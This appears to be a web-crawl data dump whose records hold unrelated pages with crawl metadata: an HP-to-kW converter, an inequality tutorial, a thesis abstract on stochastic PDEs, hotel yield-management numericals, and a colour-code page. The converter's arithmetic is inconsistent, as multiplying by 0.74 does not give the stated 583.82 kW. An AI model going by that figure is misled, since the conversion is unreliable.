] | {"ft_lang_label":"__label__en","ft_lang_prob":0.879544,"math_prob":0.9182016,"size":83156,"snap":"2023-40-2023-50","text_gpt3_token_len":19215,"char_repetition_ratio":0.16177602,"word_repetition_ratio":0.025570417,"special_character_ratio":0.23473953,"punctuation_ratio":0.19263165,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9636033,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26],"im_url_duplicate_count":[null,null,null,4,null,4,null,4,null,4,null,4,null,4,null,4,null,4,null,4,null,4,null,4,null,4,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-10-01T00:04:44Z\",\"WARC-Record-ID\":\"<urn:uuid:71af93a1-0be1-4cc0-bf9e-a6e387e6427c>\",\"Content-Length\":\"372668\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:72429d4b-4ede-4e4a-a18b-649194c6f0dd>\",\"WARC-Concurrent-To\":\"<urn:uuid:295e2a83-5749-4225-988c-a35eea2f09a0>\",\"WARC-IP-Address\":\"81.3.21.103\",\"WARC-Target-URI\":\"https://hess.copernicus.org/articles/24/2633/2020/\",\"WARC-Payload-Digest\":\"sha1:ISU2NGACMXNBZKKGYMTEHRAQ7OPBNHFY\",\"WARC-Block-Digest\":\"sha1:V5IBBGA3RADX4WDPNYEINAOK72BZYXD5\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233510730.6_warc_CC-MAIN-20230930213821-20231001003821-00838.warc.gz\"}"} |
https://kw2hp.co.uk/794-hp-equals-to-how-many-kw-kilowatts/ | [
"# 794 HP equals to how many kW (kilowatts)?\n\n794 HP after calculating to kW (kilowatts) is 583,82 kW and equals 783,12 BHP.\n\nHow to calculate that 794 HP is 583,82 kW (kilowatts)?\n\nIt’s very simple – just multiply 794 HP by 0,74. It gives 583,82 kW (kilowatts)."
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.582374,"math_prob":0.9979701,"size":429,"snap":"2020-34-2020-40","text_gpt3_token_len":144,"char_repetition_ratio":0.16941176,"word_repetition_ratio":0.9459459,"special_character_ratio":0.4079254,"punctuation_ratio":0.16981132,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97350997,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-25T09:32:32Z\",\"WARC-Record-ID\":\"<urn:uuid:c1e07987-5dfe-4871-839f-a9fd857291c4>\",\"Content-Length\":\"38169\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:0ee5f63f-721f-410e-ba25-cf753ff4d2f4>\",\"WARC-Concurrent-To\":\"<urn:uuid:ccf2a8b1-b736-4396-b48a-41a1c49f6694>\",\"WARC-IP-Address\":\"195.78.66.124\",\"WARC-Target-URI\":\"https://kw2hp.co.uk/794-hp-equals-to-how-many-kw-kilowatts/\",\"WARC-Payload-Digest\":\"sha1:NDZVE6CMIFRRGAAL7DGVJSSE2MRHEF3O\",\"WARC-Block-Digest\":\"sha1:NS4RXKGBMZZDDXHIVNOYOY56R6AEY43X\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600400223922.43_warc_CC-MAIN-20200925084428-20200925114428-00638.warc.gz\"}"} |
https://www.had2know.org/academics/solve-absolute-value-inequality-equation.html | [
"# How to Solve Absolute Value Inequalities\n\n | X + | > ≥ = ≤ <\n\nEquations with absolute values and inequalities have the form\n\n|ax+b| > c or |ax+b| < c\n\nwhere x is the variable in the algebra problem, and the parameters a, b, and c are constants, and c is positive. These problems are frequently encountered on standardized tests such as the SAT, ACT, GRE, and GMAT. They also arise in many practical applications, such as determining distances between points.\n\nWhen you solve algebraic inequalities, the solution for x is actually a range of values. And when you solve math problems involving absolute values, you must always analyze two cases. This makes absolute value inequality problems rather challenging because the solution is given in terms of two inequalities. You can use the outline below as a guide when solving these types of algebra problems, or use the absolute value inequality calculator on the left.\n\n#### Step 1\n\nIf the inequality is in the form |ax+b| > c or |ax+b| ≥ c, you must set up and solve these two equations:\n\nax+b >/≥ c and ax+b </≤ -c.\n\nIf the inequality is in the form |ax+b| < c or |ax+b| ≤ c, you must set up and solve these two equations:\n\nax+b </≤ c and ax+b >/≥ -c.\n\nThese are now regular algebra equations in one variable.\n\n#### Step 2\n\nUse the rules of inequalities to solve both equations for the range of x values. Remember, if you divide or multiply both sides of an equality by a negative number, you must switch the direction of the inequality. Your final result will be two inequalities that represent the possible values for x.\n\n#### Example\n\nSolve the equation |2x-9| > 13. The first step is to split it into two equations:\n\n2x - 9 > 13 and 2x - 9 < -13\n\nThe first inequality equation can be simplified to 2x > 22, or x > 11. The second equation can be simplified to 2x < -4, or x < -2. So the full solution is {x > 11, x < -2}. This range of solutions happens to be a disjoint set. Another way of expressing the solution is that x can equal all real numbers except for numbers between -2 and 11 (inclusive)."
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.9044784,"math_prob":0.9993611,"size":2016,"snap":"2022-40-2023-06","text_gpt3_token_len":490,"char_repetition_ratio":0.14960238,"word_repetition_ratio":0.08152174,"special_character_ratio":0.25297618,"punctuation_ratio":0.09975062,"nsfw_num_words":1,"has_unicode_error":false,"math_prob_llama3":0.99954677,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-09-26T03:36:28Z\",\"WARC-Record-ID\":\"<urn:uuid:9ba15a3f-7248-4cb7-b76f-f6f288ce3a2c>\",\"Content-Length\":\"20999\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:dbda61d4-f5f2-4747-b1e8-43e1b47fcf89>\",\"WARC-Concurrent-To\":\"<urn:uuid:9af4f805-7327-4591-9254-61257951ecfc>\",\"WARC-IP-Address\":\"37.61.237.29\",\"WARC-Target-URI\":\"https://www.had2know.org/academics/solve-absolute-value-inequality-equation.html\",\"WARC-Payload-Digest\":\"sha1:YKY4WI7X35667ES5WHXPYKBRU7PHY4F6\",\"WARC-Block-Digest\":\"sha1:DQAW7V7SBNRHAHH7TZ2Z3KL2IMQHJX2X\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030334644.42_warc_CC-MAIN-20220926020051-20220926050051-00192.warc.gz\"}"} |
https://hammer.figshare.com/articles/thesis/Contributions_to_Rough_Paths_and_Stochastic_PDEs/12720878/1 | [
"## File(s) under embargo\n\nReason: One chapter submitted for publication\n\ndays\n\n## 2\n\nhours\n\nuntil file(s) become available\n\n## Contributions to Rough Paths and Stochastic PDEs\n\nthesis\nposted on 27.07.2020, 15:27\nProbability theory is the study of random phenomena. Many dynamical systems with random influence, in nature or artificial complex systems, are better modeled by equations incorporating the intrinsic stochasticity involved. In probability theory, stochastic partial differential equations (SPDEs) generalize partial differential equations through random force terms and coefficients, while stochastic differential equations (SDEs) generalize ordinary differential equations. They are both abound in models involving Brownian motion throughout science, engineering and economics. However, Brownian motion is just one example of a random noisy input. The goal of this thesis is to make contributions in the study and applications of stochastic dynamical systems involving a wider variety of stochastic processes and noises. This is achieved by considering different models arising out of applications in thermal engineering, population dynamics and mathematical finance.\n\n1. Power-type non-linearities in SDEs with rough noise: We consider a noisy differential equation driven by a rough noise that could be a fractional Brownian motion, a generalization of Brownian motion, while the equation's coefficient behaves like a power function. These coefficients are interesting because of their relation to classical population dynamics models, while their analysis is particularly challenging because of the intrinsic singularities. Two different methods are used to construct solutions: (i) In the one-dimensional case, a well-known transformation is used; (ii) For multidimensional situations, we find and quantify an improved regularity structure of the solution as it approaches the origin. Our research is the first successful analysis of the system described under a truly rough noise context. We find that the system is well-defined and yields non-unique solutions. In addition, the solutions possess the same roughness as that of the noise.\n\n2. Parabolic Anderson model in rough environment: The parabolic Anderson model is one of the most interesting and challenging SPDEs used to model varied physical phenomena. Its original motivation involved bound states for electrons in crystals with impurities. It also provides a model for the growth of magnetic field in young stars and has an interpretation as a population growth model. The model can be expressed as a stochastic heat equation with additional multiplicative noise. This noise is traditionally a generalized derivative of Brownian motion. Here we consider a one dimensional parabolic Anderson model which is continuous in space and includes a more general rough noise. We first show that the equation admits a solution and that it is unique under some regularity assumptions on the initial condition. In addition, we show that it can be represented using the Feynman-Kac formula, thus providing a connection with the SPDE and a stochastic process, in this case a Brownian motion. The bulk of our study is devoted to explore the large time behavior of the solution, and we provide an explicit formula for the asymptotic behavior of the logarithm of the solution.\n\n3. Heat conduction in semiconductors: Standard heat flow, at a macroscopic level, is modeled by the random erratic movements of Brownian motions starting at the source of heat. However, this diffusive nature of heat flow predicted by Brownian motion is not observed in certain materials (semiconductors, dielectric solids) over short length and time scales. The thermal transport in these materials is more akin to a super-diffusive heat flow, and necessitates the need for processes beyond Brownian motion to capture this heavy tailed behavior. In this context, we propose the use of a well-defined Lévy process, the so-called relativistic stable process to better model the observed phenomenon. This process captures the observed heat dynamics at short length-time scales and is also closely related to the relativistic Schrödinger operator. In addition, it serves as a good candidate for explaining the usual diffusive nature of heat flow under large length-time regimes. The goal is to verify our model against experimental data, retrieve the best parameters of the process and discuss their connections to material thermal properties.\n\n4. Bond-pricing under partial information: We study an information asymmetry problem in a bond market. Especially we derive bond price dynamics of traders with different levels of information. We allow all information processes as well as the short rate to have jumps in their sample paths, thus representing more dramatic movements. In addition we allow the short rate to be modulated by all information processes in addition to having instantaneous feedbacks from the current levels of itself. A fully informed trader observes all information which affects the bond price while a partially informed trader observes only a part of it. We first obtain the bond price dynamic under the full information, and also derive the bond price of the partially informed trader using Bayesian filtering method. The key step is to perform a change of measure so that the dynamic under the new measure becomes computationally efficient.\n\n### History\n\n#### Degree Type\n\nDoctor of Philosophy\n\nStatistics\n\nWest Lafayette\n\nKiseop Lee\n\nSamy Tindel\n\nRaghu Pasupathy"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.9169155,"math_prob":0.9268842,"size":5408,"snap":"2021-04-2021-17","text_gpt3_token_len":1010,"char_repetition_ratio":0.11417469,"word_repetition_ratio":0.0024783148,"special_character_ratio":0.17326184,"punctuation_ratio":0.08700441,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9721106,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-01-23T22:10:44Z\",\"WARC-Record-ID\":\"<urn:uuid:57d0ce7a-29c7-4313-a21a-3f40b068f458>\",\"Content-Length\":\"141398\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:32136588-59b6-490d-b70f-ea2366b914e7>\",\"WARC-Concurrent-To\":\"<urn:uuid:c69433ea-7c3c-4956-b88d-d5aba449f7e6>\",\"WARC-IP-Address\":\"52.16.197.180\",\"WARC-Target-URI\":\"https://hammer.figshare.com/articles/thesis/Contributions_to_Rough_Paths_and_Stochastic_PDEs/12720878/1\",\"WARC-Payload-Digest\":\"sha1:27WFYQGIUNKQDZ2KHSIZRJIFDKXZYCUI\",\"WARC-Block-Digest\":\"sha1:2JQ63Z4MNATMEJDQJLE2EFIQQ3U37CFI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-04/CC-MAIN-2021-04_segments_1610703538431.77_warc_CC-MAIN-20210123191721-20210123221721-00299.warc.gz\"}"} |
https://www.ihmnotessite.net/yield-mngt-numericals | [
"top of page\n\n# Numericals\n\nMEASURING YIELD\n\nFORMULA 1:\n\nPot avg single rate = Single occ room revenue / No of rooms sold as single\n\nFORMULA 2:\n\nPot avg double rate = Double occ room rev/ No of rooms sold as double\n\nFORMULA 3:\n\nMultiple occ % = No of rooms sold on multiple occ / No of occupied rooms x 100\n\nFORMULA 4:\n\nDifference between:\n\nPotential average double rate – Potential average single rate\n\nHigher the rate spread customer has less choice to take higher price rooms and upgrade\n\nFORMULA 5:\n\nPotential average rate = (Multiple occupancy percentage x rate spread ) + potential avg single rate\n\nFORMULA 6:\n\nAchievement factor= Actual Average room rate (ARR) /Potential avg room rate (PAR)\n\nFORMULA 7:\nMEASURING YIELD\n\nYIELD is expressed as the ratio of = Actual room revenue/ Potential room revenue\n\nYIELD % = Actual room revenue / Potential room revenue x 100\n\nYIELD = Actual room revenue/Potential room revenue\n\nYIELD = Total rooms sold/ Total available rooms x Actual avg room rate(ARR)/ Potential avg room rate\n\nYIELD = Occupancy percentage x Achievement factor\n\nNOTE: Maximum value of yield is 1\n\n• This statement is possible only when the value of actual rev/potential rev is equal.\n\n• Only if the rooms at actual rev are sold at rack rate at 100%\n\nActual rev/Potential rev = 600000/600000 = 1\n\n• Occupancy % = Total rooms sold / Total no of rooms available x 100\n\nIt expresses total no. of rooms sold to the no. of rooms available\n\n• Average Daily Rate: Room Revenue/ No of rooms sold\n\nIt expresses avg amount paid per rooms to that of total no.of rooms sold\n\n• RevPAR = Revenue per Available Room\n\nThere are two formulas\n\n• RevPAR = Room Revenue/ Total rooms available\n\n• RevPAR = ADR X Occupancy %\n\nWHY RevPAR?\n\nBest measurement for maximizing room revenue as it identifies hotels occupancy percentage and ADR together, they challenge hoteliers to maximize occupancy and room rates.\n\nIDENTICAL YIELDS\n\nIf combination of Occupancy percentage and Average room rate results in equivalent revenue or equal yields\n\nIdentical yield occupancy %\n\nIdentical yield occ % = Current occ% x Current rate/ Proposed rate\n\nEQUIVALENT OCCUPANCY\n\nIt is the occupancy percentage that a hotel has to achieve if the hotel plans to change it ARR (higher or lower )\n\nIt evaluates whether the change in ARR is justified or not.\n\nEquivalent Occ% = Current occ% x Current contribution margin/ New contribution margin\n\nContribution margin = Room rate - Marginal cost (cleaning supplies)\n\nYIELD MANAGEMENT SOFTWARE\n\nYield management software is designed to analyze the following:\n\n1. Dates of High and low demands in the hotel\n\n2. Monitor booking pattern\n\n3. Categorize information and help in forecasting\n\n4. Monitor and manage risk automatically\n\n5. Forecasting function space in the hotel (F&B)\n\n6. On to one revenue management (RevPAG)\n\n7. Calculation on FIT and group bookings\n\nQ1. Front office manager of Taj view hotel has received the daily report with the following data.\n\nTotal rooms = 300\n\nRooms sold = 240\n\nRack rate = 2000/-\n\n85 rooms sold @ Rs 1,500/-\n\n65 rooms sold @ Rs 1,000/-\n\n90 rooms sold @ Rs 900/-\n\nDetermine the yield and yield %\n\nSolution\n\nYield = actual rev/ potential rev\n\nActual rev=85 x 1500+ 65 x 1000+ 90 x 900=273500\n\nPotential rev = 300 x 2000 = 600000\n\nYield = 273500/ 600000 = .45\n\nYield %= .45x100 = 45%\n\nQ2. Front office manager of Hotel Retreat has the following information from his daily report.\n\nTotal rooms =350\n\nOccupancy= 80%\n\nRack rate = Rs.3000/-\n\n125 rooms sold @ Rs.2700/-\n\n100 rooms sold @ Rs.2500/-\n\n55 rooms sold @ Rs.2000/-\n\nDetermine yield %\n\nSoln 2.\n\nActual rev =125 x 2700 + 100 x 2500 + 55 x 2000 = 697500\n\nPotential rev = 350 x 3000 = 1050000\n\nYield = 697500/1050000 = .66\n\nYield % = 66%\n\nHigher the yield % better the performance\n\nQ3. A 300 room hotel with Rs 1000/- as rack rate sells 200 rooms at an average rate of Rs.800/-\n\nCalculate yield.\n\nQ4. A 300 room Casa Vana Inn sells rooms for a total of Rs 5,25,000/-.What is the hotels revenue per available room ?\n\nQ5. A 100 room hotel sold\n\n30 rooms at Rs.40\n\n30 rooms at Rs.50\n\n30 rooms at Rs.60\n\nWhat is hotels revPAR ?\n\nSoln 5. II method\n\nRev PAR= ADR x Occupancy %\n\nAverage daily rate = Total room rev = 4500 = 50\n\nNo of rooms sold = 90\n\nOcc % = No of rooms sold/No of rooms available = 90/100 = .9\n\nRevPAR = 50 x .9 = 45\n\nQ6. Hotel Retreat has 300 guestrooms and collects an average of Rs.2000/- per room and is operating at 70% average occupancy. the hotel offers 100 one bedded and 200 two bedded room. The rates for the rooms are\n\n1. One bedded room tariff Rs.3000/- when sold for single occupancy\n\n2. One bedded room tariff Rs.4000/- when sold for double occupancy\n\n3. Two bedded room tariff Rs.3500/- when sold for single occupancy\n\n4. Two bedded room tariff Rs.4500/- when sold for double occupancy\n\nCompute the following\n\n1. Potential average single rate\n\n2. Potential average double rate\n\n4. Multiple occupancy % (105 rooms out of occupied rooms are on multiple occ)\n\n5. Potential average rate\n\n6. Achievement factor and yield %\n\nSOLUTIONS:-\n\n1.Potential avg single rate = Single occ room revenue/ No of rooms sold as single\n\nPotential rev at 100% occ = (100 x 3000) + (200 x 3500) = 10,00,000\n\nPotential avg single rate= 10,00,000 /300 = Rs. 3333.33\n\n2.Potential avg double rate = Double occ room revenue/ No of rooms sold as double = (100 x 4000) + (200 x 4500) =13,00000\n\nPotential avg double rate = 13,00000 / 300 = Rs. 4333.33\n\n3.Rate spread = Pot avg double rate – Pot avg single rate = 4,333.33- 3,333.33 = Rs 1,000\n\n4. Multiple Occ % = No of rooms sold on multiple occ/ No of occupied rooms x 100\n\nNo.of rooms occupied= 70/100 x 300 = 210 rooms\n\nMultiple Occ % = 105/210 x 100 = 50%\n\n5. Potential avg room rate = Multiple occ% x Rate spread +Potential avg single rate\n\n= 50/100 x 1000 + 3333.33 = 500 + 3333.33 = Rs. 3833.33\n\n6. Achievement factor = Actual avg room rate (ARR)/ Potential avg room rate = 2000/3833.33\n\n= .522 or 52%\n\n7. Yield = Occ % x Achievement factor = 70/100 x 52/100 = 36.40 %\n\nbottom of page"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.83886766,"math_prob":0.9935413,"size":5980,"snap":"2022-40-2023-06","text_gpt3_token_len":1674,"char_repetition_ratio":0.17687416,"word_repetition_ratio":0.05407883,"special_character_ratio":0.32324415,"punctuation_ratio":0.08212996,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98921144,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-30T09:08:08Z\",\"WARC-Record-ID\":\"<urn:uuid:9664d283-6384-4fc5-a13f-592d1cc74f79>\",\"Content-Length\":\"866417\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e1f86495-2e0d-4c4f-aaf8-90589ca28fd1>\",\"WARC-Concurrent-To\":\"<urn:uuid:47ecdc43-cef4-43e3-b4df-01a5054df673>\",\"WARC-IP-Address\":\"146.75.33.84\",\"WARC-Target-URI\":\"https://www.ihmnotessite.net/yield-mngt-numericals\",\"WARC-Payload-Digest\":\"sha1:T7DKGTCE2NS3YG2YO7IMLWSM7GNG46QT\",\"WARC-Block-Digest\":\"sha1:NI36O3APMHEVBSGWPTZZ4KJADQVS6DEM\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764499804.60_warc_CC-MAIN-20230130070411-20230130100411-00091.warc.gz\"}"} |
https://www.colorhexa.com/76bcd3 | [
"# #76bcd3 Color Information\n\nIn a RGB color space, hex #76bcd3 is composed of 46.3% red, 73.7% green and 82.7% blue. Whereas in a CMYK color space, it is composed of 44.1% cyan, 10.9% magenta, 0% yellow and 17.3% black. It has a hue angle of 194.8 degrees, a saturation of 51.4% and a lightness of 64.5%. #76bcd3 color hex could be obtained by blending #ecffff with #0079a7. Closest websafe color is: #66cccc.\n\n• R 46\n• G 74\n• B 83\nRGB color chart\n• C 44\n• M 11\n• Y 0\n• K 17\nCMYK color chart\n\n#76bcd3 color description : Slightly desaturated cyan.\n\n# #76bcd3 Color Conversion\n\nThe hexadecimal color #76bcd3 has RGB values of R:118, G:188, B:211 and CMYK values of C:0.44, M:0.11, Y:0, K:0.17. Its decimal value is 7781587.\n\nHex triplet RGB Decimal 76bcd3 `#76bcd3` 118, 188, 211 `rgb(118,188,211)` 46.3, 73.7, 82.7 `rgb(46.3%,73.7%,82.7%)` 44, 11, 0, 17 194.8°, 51.4, 64.5 `hsl(194.8,51.4%,64.5%)` 194.8°, 44.1, 82.7 66cccc `#66cccc`\nCIE-LAB 72.574, -16.015, -18.455 37.209, 44.519, 68.257 0.248, 0.297, 44.519 72.574, 24.435, 229.049 72.574, -32.304, -26.346 66.723, -17.22, -13.947 01110110, 10111100, 11010011\n\n# Color Schemes with #76bcd3\n\n• #76bcd3\n``#76bcd3` `rgb(118,188,211)``\n• #d38d76\n``#d38d76` `rgb(211,141,118)``\nComplementary Color\n• #76d3bc\n``#76d3bc` `rgb(118,211,188)``\n• #76bcd3\n``#76bcd3` `rgb(118,188,211)``\n• #768ed3\n``#768ed3` `rgb(118,142,211)``\nAnalogous Color\n• #d3bc76\n``#d3bc76` `rgb(211,188,118)``\n• #76bcd3\n``#76bcd3` `rgb(118,188,211)``\n• #d3768e\n``#d3768e` `rgb(211,118,142)``\nSplit Complementary Color\n• #bcd376\n``#bcd376` `rgb(188,211,118)``\n• #76bcd3\n``#76bcd3` `rgb(118,188,211)``\n• #d376bc\n``#d376bc` `rgb(211,118,188)``\n• #76d38d\n``#76d38d` `rgb(118,211,141)``\n• #76bcd3\n``#76bcd3` `rgb(118,188,211)``\n• #d376bc\n``#d376bc` `rgb(211,118,188)``\n• #d38d76\n``#d38d76` `rgb(211,141,118)``\n• #3d9fbf\n``#3d9fbf` `rgb(61,159,191)``\n• #4fa9c7\n``#4fa9c7` `rgb(79,169,199)``\n• #63b3cd\n``#63b3cd` `rgb(99,179,205)``\n• #76bcd3\n``#76bcd3` `rgb(118,188,211)``\n• #89c5d9\n``#89c5d9` `rgb(137,197,217)``\n• #9dcfdf\n``#9dcfdf` `rgb(157,207,223)``\n• #b0d8e6\n``#b0d8e6` `rgb(176,216,230)``\nMonochromatic Color\n\n# Alternatives to #76bcd3\n\nBelow, you can see some colors close to #76bcd3. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #76d3d3\n``#76d3d3` `rgb(118,211,211)``\n• #76ccd3\n``#76ccd3` `rgb(118,204,211)``\n• #76c4d3\n``#76c4d3` `rgb(118,196,211)``\n• #76bcd3\n``#76bcd3` `rgb(118,188,211)``\n• #76b4d3\n``#76b4d3` `rgb(118,180,211)``\n``#76add3` `rgb(118,173,211)``\n• #76a5d3\n``#76a5d3` `rgb(118,165,211)``\nSimilar Colors\n\n# #76bcd3 Preview\n\nThis text has a font color of #76bcd3.\n\n``<span style=\"color:#76bcd3;\">Text here</span>``\n#76bcd3 background color\n\nThis paragraph has a background color of #76bcd3.\n\n``<p style=\"background-color:#76bcd3;\">Content here</p>``\n#76bcd3 border color\n\nThis element has a border color of #76bcd3.\n\n``<div style=\"border:1px solid #76bcd3;\">Content here</div>``\nCSS codes\n``.text {color:#76bcd3;}``\n``.background {background-color:#76bcd3;}``\n``.border {border:1px solid #76bcd3;}``\n\n# Shades and Tints of #76bcd3\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. In this example, #040a0b is the darkest color, while #fcfdfe is the lightest one.\n\n• #040a0b\n``#040a0b` `rgb(4,10,11)``\n• #08161a\n``#08161a` `rgb(8,22,26)``\n• #0d2229\n``#0d2229` `rgb(13,34,41)``\n• #122f38\n``#122f38` `rgb(18,47,56)``\n• #173b47\n``#173b47` `rgb(23,59,71)``\n• #1c4756\n``#1c4756` `rgb(28,71,86)``\n• #205465\n``#205465` `rgb(32,84,101)``\n• #256073\n``#256073` `rgb(37,96,115)``\n• #2a6c82\n``#2a6c82` `rgb(42,108,130)``\n• #2f7991\n``#2f7991` `rgb(47,121,145)``\n• #3385a0\n``#3385a0` `rgb(51,133,160)``\n• #3891af\n``#3891af` `rgb(56,145,175)``\n• #3d9ebe\n``#3d9ebe` `rgb(61,158,190)``\n• #49a6c5\n``#49a6c5` `rgb(73,166,197)``\n``#58adc9` `rgb(88,173,201)``\n• #67b5ce\n``#67b5ce` `rgb(103,181,206)``\n• #76bcd3\n``#76bcd3` `rgb(118,188,211)``\n• #85c3d8\n``#85c3d8` `rgb(133,195,216)``\n• #94cbdd\n``#94cbdd` `rgb(148,203,221)``\n• #a3d2e1\n``#a3d2e1` `rgb(163,210,225)``\n• #b1d9e6\n``#b1d9e6` `rgb(177,217,230)``\n• #c0e0eb\n``#c0e0eb` `rgb(192,224,235)``\n• #cfe8f0\n``#cfe8f0` `rgb(207,232,240)``\n• #deeff4\n``#deeff4` `rgb(222,239,244)``\n• #edf6f9\n``#edf6f9` `rgb(237,246,249)``\n• #fcfdfe\n``#fcfdfe` `rgb(252,253,254)``\nTint Color Variation\n\n# Tones of #76bcd3\n\nA tone is produced by adding gray to any pure hue. In this case, #a0a7a9 is the less saturated color, while #4cd1fd is the most saturated one.\n\n• #a0a7a9\n``#a0a7a9` `rgb(160,167,169)``\n• #99aab0\n``#99aab0` `rgb(153,170,176)``\n• #92aeb7\n``#92aeb7` `rgb(146,174,183)``\n• #8bb1be\n``#8bb1be` `rgb(139,177,190)``\n• #84b5c5\n``#84b5c5` `rgb(132,181,197)``\n• #7db8cc\n``#7db8cc` `rgb(125,184,204)``\n• #76bcd3\n``#76bcd3` `rgb(118,188,211)``\n• #6fc0da\n``#6fc0da` `rgb(111,192,218)``\n• #68c3e1\n``#68c3e1` `rgb(104,195,225)``\n• #61c7e8\n``#61c7e8` `rgb(97,199,232)``\n• #5acaef\n``#5acaef` `rgb(90,202,239)``\n• #53cef6\n``#53cef6` `rgb(83,206,246)``\n• #4cd1fd\n``#4cd1fd` `rgb(76,209,253)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #76bcd3 is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.5572234,"math_prob":0.6371377,"size":3746,"snap":"2021-31-2021-39","text_gpt3_token_len":1669,"char_repetition_ratio":0.121058255,"word_repetition_ratio":0.011090573,"special_character_ratio":0.538441,"punctuation_ratio":0.23783186,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98058707,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-08-04T01:00:15Z\",\"WARC-Record-ID\":\"<urn:uuid:592f6b3c-a215-4edf-8fc5-bca7197911f6>\",\"Content-Length\":\"36263\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:13a048bc-ea30-42ce-a400-10ee9a117720>\",\"WARC-Concurrent-To\":\"<urn:uuid:3b601896-9727-4c45-bc2d-008bb288c624>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/76bcd3\",\"WARC-Payload-Digest\":\"sha1:BLBCNCJPXAV4KTF6TEH3PFS6S3WZP5LD\",\"WARC-Block-Digest\":\"sha1:U2BU43BBQBNBX7PTGQFVEMCYAKK64UFU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046154486.47_warc_CC-MAIN-20210803222541-20210804012541-00601.warc.gz\"}"} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.